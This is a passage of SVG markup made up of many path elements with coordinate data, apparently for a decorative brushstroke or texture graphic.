d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,